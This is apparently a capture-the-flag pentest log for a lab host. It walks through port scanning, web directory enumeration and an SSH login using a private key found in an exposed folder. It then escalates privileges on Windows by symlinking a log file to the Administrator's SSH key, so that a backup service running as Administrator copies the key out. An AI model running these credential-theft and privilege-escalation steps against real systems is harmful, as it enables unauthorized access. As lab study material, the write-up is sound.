Symbolic

🧪 Pentest Log: {{date:2025-08-22}}

๐Ÿ” Target Information

ip=192.168.106.177

📡 Enumeration

🔌 Port Scanning

Command Used

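# Two-pass TCP scan followed by a UDP scan of the host in $ip.
# $ip is assigned earlier in these notes; abort if it is missing so nmap is
# never started without a target.
: "${ip:?ip is not set}"

# Pass 1: sweep all TCP ports and reduce the output to a comma-separated list
# of the port numbers nmap reported (lines that start with a digit).
ports=$(nmap -p- --min-rate=1000 -T4 "$ip" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

# Pass 2: default scripts and version detection on the ports found above.
# With an empty list, -p would take the next option as its port specification,
# so the service scan is skipped instead.
if [ -n "$ports" ]; then
  nmap -p"$ports" -sC -sV "$ip" -oN tcp_scan_result.txt
else
  printf 'no open TCP ports reported for %s; skipping service scan\n' "$ip" >&2
fi

# Top 100 UDP ports, written to a separate result file.
nmap -sU --top-ports 100 "$ip" -oN udp_scan_result.txt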

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Found the /pdfs directory and obtained the contents of an id_rsa private key from it:

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

💣 Exploitation / Foothold

Tool / Script Used:

📌 Vulnerability Summary

🚀 Exploit Execution

🔧 Exploit Method

Tool / Script Used:

ssh -i id_rsa p4yl0ad@$ip

🧬 Privilege Escalation

👤 Current Access

๐Ÿ” Enumeration

PrivescCheck:

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Found

Name        : BackupLogService
DisplayName : BackupLogService
ImagePath   : C:\Program Files\nssm-2.24\win64\nssm.exe
User        : .\Administrator
StartMode   : Automatic

Found a Backup folder under C:\ and viewed its backup.ps1 file, presumably the script that BackupLogService runs as .\Administrator:

# backup.ps1 as found on the target: once a minute it copies the web server's
# request log into C:\backup\logs, naming each copy after the current timestamp.
# NOTE(review): presumably launched by BackupLogService (nssm, User .\Administrator),
# in which case the copy reads the source path with Administrator rights - confirm.
$log = "C:\xampp\htdocs\logs\request.log" 
$backup = "C:\backup\logs"

while($true) {
        # Grabbing Backup
        # NOTE(review): the source path is never validated before the copy. If a
        # lower-privileged account can replace request.log with a link, the link
        # target is what gets copied into the backup folder. Mitigations: run the
        # service under a dedicated low-privilege account, restrict write access
        # to the logs directory, and refuse to copy when the source is a reparse
        # point.
        copy $log $backup\$(get-date -f MM-dd-yyyy_HH_mm_s)
        Start-Sleep -s 60
}

🔓 Privilege Escalation Exploit

📌 Exploit Summary

🔧 Exploit Steps

del C:\xampp\htdocs\logs\request.log

CreateSymlink.exe "C:\xampp\htdocs\logs\request.log" "C:\Users\Adminis
trator\.ssh\id_rsa"

type 08-22-2025_20_01_47

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
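# Typo fix: the client is ssh (the notes had `ss`). Uses the key saved as
# id_rsa_admin; $ip is assigned earlier in these notes.
ssh -i id_rsa_admin "administrator@$ip"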